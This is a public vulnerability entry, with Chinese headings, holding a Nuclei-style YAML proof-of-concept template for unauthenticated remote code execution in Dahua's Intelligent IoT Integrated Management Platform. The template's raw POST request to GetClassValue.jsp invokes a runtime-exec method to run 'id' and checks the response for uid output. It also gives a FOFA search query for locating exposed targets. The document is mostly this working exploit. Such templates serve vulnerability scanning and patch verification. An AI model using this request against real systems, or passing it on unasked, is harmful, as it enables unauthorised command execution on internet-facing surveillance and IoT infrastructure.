漏洞描述
Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
dahua-icc-getclassvalue-rce: Dahua 'GetClassValue' - Remote Code Execution
PoC代码[已公开]
id: dahua-icc-getclassvalue-rce
info:
name: Dahua 'GetClassValue' - Remote Code Execution
author: ProjectDiscoveryAI
severity: critical
description: |
Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
reference:
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-getclassvalue-rce.yaml
metadata:
fofa-query: app="dahua-智能物联综合管理平台"
max-request: 1
tags: rce,java,dahua,iot,unauth
http:
- raw:
- |
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"data": {
"clazzName": "com.dahua.admin.util.RuntimeUtil",
"methodName": "syncexecReturnInputStream",
"fieldName": ["id"]
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 480a0045304302200a18d5a0816e0aa6bb6c812f532509137be15818ebbb106c4a70250b797e3ae5021f15f0e7344f4ead99705d02ee6bd3fc10fd04d5a8c45ac47fa3337e3512221b:922c64590222798bb761d5b6d8e72950